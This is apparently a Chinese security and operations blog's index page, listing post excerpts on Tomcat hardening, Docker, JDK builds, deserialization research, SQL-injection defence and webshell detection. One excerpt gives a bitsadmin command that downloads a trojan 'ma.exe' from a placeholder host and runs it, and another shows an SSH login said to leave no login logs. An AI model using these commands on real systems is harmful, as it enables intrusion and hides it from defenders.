加载中
Tomcat配置安全优化

Linux云主机加固系列之:Tomcat配置安全优化 阅读时间:2分钟 阅读对象:网络运维和网络管理人员 使用场景:用到tomcat应用 看完这篇文章,你能得到什么? 知道在linux情况下如何进行tomcat安...

01/07 12:13
15
docker搭建sonarqube做代码审计

为了更好的做未来升级(sonarqube升级比较频繁)所以使用两个容器连接 插件和数据库文件也使用宿主文件系统 创建/Users/k4n5ha0/sonarqube/data/postgresql/data 文件夹作为pg数据库文件储存...

删除docker images中为none的镜像

由于平时一直使用docker build 命令才生成一个镜像,有时候由于代码跟新频繁就会产生很多的none的image,最近想着清除一下。 于是就写了以下脚本: docker ps -a | grep "Exited" | awk '{p...

2018/12/28 15:46
3
clojue镜像

{ :user { :mirrors { "central" { :name "aliyun" :url "https://maven.aliyun.com/nexus/content/groups/public/" } ......

2018/12/01 10:37
5
jdk11 环境变量

export JAVA_HOME=/home/ubuntu/jdk-11.0.1 export PATH=$JAVA_HOME/bin:$PATH /etc/profile 设置好就行了...

JDK
2018/11/29 05:17
33
tomcat 安全记述

<servlet> <servlet-name>jsp</servlet-name> <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class> <init-param> <param-name>fork</param-name> ......

linux下如何批量杀JAVA进程或某个进程方法

pkill -9 java 或者 ps -ef | grep java | grep -v grep | cut -c 9-15 | xargs kill -9 运行这条命令将会杀掉所有含有关键字"java"的进程 下面将这条命令作一下简单说明: 管道符"|"用来隔开...

2018/11/23 09:25
43
反序列化漏洞研究

最近几周一直在研究java的反序列化漏洞相关问题 我们先来看看这个著名的类和其中的那个方法了 对没错 就是这个大名鼎鼎的readObject方法 一旦黑客发现了"可乘之机" 就会构造一个paylaods比如...

2018/09/27 13:17
24
编译jdk8

本文环境 ubuntu 16.04 全新安装虚拟机 apt -y install mercurial # 安装版本控制 add-apt-repository ppa:openjdk-r/ppa apt-get update # 安装jdk7 编译jdk8 需要jdk7 apt -y install ope...

2018/09/12 17:33
27
威胁狩猎简介<译文>

什么是威胁狩猎 威胁狩猎也被叫做威胁搜索、网络狩猎或者网络威胁搜索,他不同于apt攻击或者红蓝军渗透测试这类模拟攻击者攻寻找黑入IT设施漏洞的行为。 在威胁狩猎中,安全专家们会打破常规...

2018/09/06 15:57
48
一个牛逼的思路

设立公司黑名单ip库 设立很多伪装性很强的二级域名 有人访问这些二级域名就把ip拉入黑名单库

2018/09/03 16:15
28
远程rce漏洞执行命令

# windows # 首先需要准备一个木马程序ma.exe bitsadmin /transfer myjob1/download /priority normal http://www.xxx.com/ma.exe c:\windows\temp\ma.exe c:\windows\temp\ma.exe # ma.exe保...

2018/09/02 09:07
113
利用lamda函数 的函数式编程 实现scrapy审计外网安全问题

import scrapy from scrapy.spiders import Spider def parse_response(response, ip_in): title = response.xpath("/html/head/title").extract()[0] filename = 'quotes.txt' with open......

2018/08/28 16:15
11
缓解java执行命令抵御反序列化漏洞的实现方案

最近st2 框架又出漏洞了 一大堆java被执行命令了 这里我提一个解决方案 可以适当缓解服务端被漏洞进行rce漏洞的问题 LD_PRELOAD替换进程底层函数 首先请看这篇文章 如果是某位c++的大佬 您老...

不会留下即时日志的ssh登录方法

ssh -T root@127.0.0.1 /bin/bash -i #-T 表示不分配伪终端 (正常的会话,在分配伪终端之后才会调用utmp和wtmp的日志接口) # /usr/bin/bash -i 表示在登录之后 调用bash命令 #不留下.bash...

2018/08/15 14:38
25
改造mybatis抵御sql注入的研究和SDL的思考

这段时间看了百度的openrasp的源代码和相关资料 (地址:https://rasp.baidu.com) 在实施的过程中还是遇到了很多的阻力,所以开始自己调研相关的技术方案 我觉得能在研发阶段就能使程序员适应安...

2018/08/09 15:47
201
调试spring boot的方法

首先在springboot的pom.xml中的插件中增加一个用于调试的插件 <build> <plugins> <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-m......

编译mybatis 3.4.6 替换到springboot 2.0.2

编译mybatis需要先编译一个mybatis的parent项目(对应的spring boot 2.0.2的mybatis-spring-boot-starter的mybatis版本) 本文举例为mybatis 3.4.6(本文当前的springboot 依赖3.4.6 可以在ide...

php查inode时间戳查webshell

<?php function read_all($dir) { if (!is_dir($dir)) return false; $handle = opendir($dir); if ($handle) { while (($fl = readdir($handle)) !== false) { $temp = $......

2018/07/07 15:53
31
利用openssl生成强密码命令

echo `openssl rand -base64 50 | tr -dc A-Z-a-z-0-9 | head -c${1:-32}` # 只会出现大小写和数字 长度控制在32位 # 第一个50代表足够的原始长度 第二个32代表长度为32......

2018/06/22 11:16
22

没有更多内容

加载失败,请刷新页面

返回顶部
顶部